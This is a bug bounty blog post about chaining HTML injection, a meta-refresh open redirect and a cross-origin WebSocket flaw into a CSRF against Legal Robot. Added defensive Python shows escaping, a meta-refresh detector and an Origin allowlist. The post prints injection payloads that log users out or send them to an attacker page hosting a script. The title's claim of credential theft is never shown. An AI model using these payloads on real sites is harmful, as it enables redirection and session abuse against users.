Chain the vulnerabilities and take your report impact on the moon (CSRF to HTML INJECTION which results in USER CREDENTIALS Stealing)

Armaan Pathan
4 min read · Aug 12, 2017


It was the weekend and time for some research. So I started reading some public disclosures from https://hackerone.com/hacktivity.
After reading some good blogs I decided to implement them, so I quickly selected my target.

I had noticed that Legal Robot (legalrobot) responds quickly and resolves vulnerabilities quickly, so I selected Legal Robot as my target and started looking into its assets and scope.

After understanding the scope I started looking into the application, and I noticed that it was not sanitizing special characters in some parameters. So I started injecting some HTML tags, and I was able to inject them.

So yeah, I had found HTML injection. BUG #1.

So I started checking whether I could execute XSS there or not.

I injected the payload, but I found that the web application is using CSP, and the alert was not popping up. :(((((((( sad part. :(

But if you are a hacker then you will never be satisfied until you exploit it.

So I started digging more and put in my second use-case payload, which was

"/><META HTTP-EQUIV="refresh" CONTENT="1;url=https://app.legalrobot.com/sign-out">

So yes, with the help of this payload, whenever a user visits the roadmap page they automatically get logged out of their account.

I found this tricky. So next I tried to redirect to my website and execute a malicious script. So I used this payload

"/><META HTTP-EQUIV="refresh" CONTENT="1;url=http://www.mysite.com/malicious_script.html">

And what it resulted in was an open redirect. BUG #2

And it also executed my malicious scripts.

Somehow I was able to perform malicious tasks.
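To make the first two bugs concrete from the defender's side, here is an added example (my code, not the author's and not Legal Robot's) that renders a roadmap field the vulnerable way and the hardened way, then parses the result to see whether a live meta refresh tag survived. The payload is the same shape as the one above, with a placeholder URL (example.invalid) instead of the author's site; the field name is hypothetical. One caveat worth knowing: a script-src CSP blocks the inline alert, but no CSP directive stops a <meta http-equiv="refresh"> navigation, which is exactly why the redirect still worked.

```python
import html
from html.parser import HTMLParser

# Constructed payload: same shape as the one in the post, placeholder URL.
REFRESH_PAYLOAD = '"/><META HTTP-EQUIV="refresh" CONTENT="1;url=https://example.invalid/">'


def render_roadmap_unsafe(title: str) -> str:
    """Vulnerable rendering (hypothetical field name): the parameter is dropped
    straight into an attribute, so a value starting with '"/>' closes the tag
    and everything after it is parsed as markup."""
    return f'<input name="roadmap_title" value="{title}">'


def render_roadmap_safe(title: str) -> str:
    """Hardened rendering: html.escape with quote=True turns <, >, &, " and '
    into entities, so the attribute cannot be broken out of."""
    return f'<input name="roadmap_title" value="{html.escape(title, quote=True)}">'


class MetaRefreshFinder(HTMLParser):
    """Collects the CONTENT of every <meta http-equiv="refresh"> the browser
    would actually see (HTMLParser lowercases tag and attribute names)."""

    def __init__(self) -> None:
        super().__init__()
        self.refresh_targets: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        a = {k: (v or "") for k, v in attrs}
        if a.get("http-equiv", "").lower() == "refresh":
            self.refresh_targets.append(a.get("content", ""))


def find_meta_refresh(markup: str) -> list[str]:
    """Return the refresh targets present in rendered markup ([] if none)."""
    finder = MetaRefreshFinder()
    finder.feed(markup)
    finder.close()
    return finder.refresh_targets


if __name__ == "__main__":
    print("unsafe:", find_meta_refresh(render_roadmap_unsafe(REFRESH_PAYLOAD)))
    print("safe:  ", find_meta_refresh(render_roadmap_safe(REFRESH_PAYLOAD)))
```

Run it and the unsafe render yields a real refresh target while the escaped render yields none; the escaped string still contains the text "META" and "refresh", which is why a substring check on the raw input is a poor detector and parsing the rendered output is the better test.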

Quickly I made a PoC of it and reported it, and I got a quick reply from the team, which was this.

Though the bug was triaged, the team member mentioned that the attacker has to do a little social engineering. I was like, yeah, but I was not satisfied when I read "SOCIAL ENGINEERING". But the team member had given me a hint by mentioning "UNKNOWN EXPLOIT". Well, that was enough of a hint for me.

Again I started digging into the application, and while I was digging into the web application I noticed that it is using WebSockets.

Okay, now I started checking the headers of every page, and I found an Origin header which was misconfigured. BUG #3

So I started opening WebSocket connections to this application from a third-party site, and I was able to connect to the application through those third-party WebSockets.

It was allowing WebSocket connections from a different Origin, and it should not work from a different origin.

I think the mobile app doesn't have an Origin. (I am still not sure about this)

So somehow I was able to do a CSRF attack, BUG #4, by using this, and I had chained HTML INJECTION WHICH WAS RESULTING IN OPEN REDIRECT to a CSRF ATTACK.
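The fix for BUG #3 is an Origin allowlist on the WebSocket handshake. The check below is an added example (mine, not Legal Robot's code) of how a server decides whether to accept an upgrade request: it normalizes the Origin header to scheme://host[:port], compares it against a constructed allowlist (app.example.invalid is a placeholder for the real app origin), rejects "null" and malformed values, and leaves the author's open question about the mobile app sending no Origin as an explicit policy flag. The header dictionary stands in for whatever request object your server framework gives you.

```python
from urllib.parse import urlsplit

# Constructed allowlist; the real application's origin goes here.
ALLOWED_ORIGINS = {"https://app.example.invalid"}


def normalize_origin(origin: str):
    """Reduce an Origin value to scheme://host[:port] so that a trailing slash,
    upper-case host or explicit default port still matches the allowlist.
    Returns None for anything malformed, including the literal 'null' that
    browsers send from sandboxed iframes and opaque origins."""
    try:
        parts = urlsplit(origin.strip())
        port = parts.port  # raises ValueError on a non-numeric port
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    default = 443 if parts.scheme == "https" else 80
    host = parts.hostname.lower()
    if port is None or port == default:
        return f"{parts.scheme}://{host}"
    return f"{parts.scheme}://{host}:{port}"


def websocket_handshake_allowed(headers: dict, allowed=ALLOWED_ORIGINS,
                                allow_missing_origin: bool = False) -> bool:
    """Accept a WebSocket upgrade only if Origin is on the allowlist.

    Browsers always send Origin on a WebSocket handshake, so a cross-site page
    cannot hide it; a request with no Origin at all is a non-browser client
    (a native mobile app, curl, ...). Whether to accept those is a policy
    choice exposed as allow_missing_origin, since it is not a cross-site
    WebSocket hijacking vector but it is also not a browser you can vouch for.
    """
    lowered = {k.lower(): v for k, v in headers.items()}
    origin = lowered.get("origin")
    if origin is None:
        return allow_missing_origin
    normalized = normalize_origin(origin)
    if normalized is None:
        return False
    allowed_normalized = {normalize_origin(a) for a in allowed}
    return normalized in allowed_normalized


if __name__ == "__main__":
    # Constructed handshake headers, as a server would see them.
    for hdrs in ({"Origin": "https://app.example.invalid"},
                 {"Origin": "https://attacker.example"},
                 {"Origin": "null"},
                 {}):
        print(hdrs, "->", websocket_handshake_allowed(hdrs))
```

The comparison is on the whole normalized origin, never a prefix or substring, so https://app.example.invalid.attacker.example and http://app.example.invalid are both refused; reflecting the incoming Origin back, or matching it with startswith, is the misconfiguration that makes the third-party connection in the post possible.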

Again I quickly made a PoC of this and reported it.

This got a quick reply, and the bug was patched in a single day. (SO QUICK)

I got good feedback with a sweet bounty amount.

Thanks, HackerOne and Legal Robot.

Thanks for reading, guys. Comments are most welcome.
Have a great day ahead.
